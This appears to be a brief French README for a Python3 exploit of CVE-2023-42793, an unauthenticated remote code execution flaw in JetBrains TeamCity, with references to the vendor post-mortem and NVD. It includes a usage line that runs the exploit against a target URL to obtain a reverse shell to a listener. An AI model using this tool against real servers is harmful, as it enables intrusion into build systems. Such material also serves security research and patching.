
JetBrains TeamCity Exécution de code à distance non authentifiée - Implémentation Python3
JetBrains TeamCity avant la version 2023.05.4 est vulnérable à un contournement d'authentification menant à une exécution de code à distance (RCE)
Pour obtenir un reverse shell
python3 exploit.py <target_url> <listener_ip> <listener_port>
https://blog.jetbrains.com/teamcity/2023/09/cve-2023-42793-vulnerability-post-mortem/
http://packetstormsecurity.com/files/174860/JetBrains-TeamCity-Unauthenticated-Remote-Code-Execution.html
https://nvd.nist.gov/vuln/detail/cve-2023-42793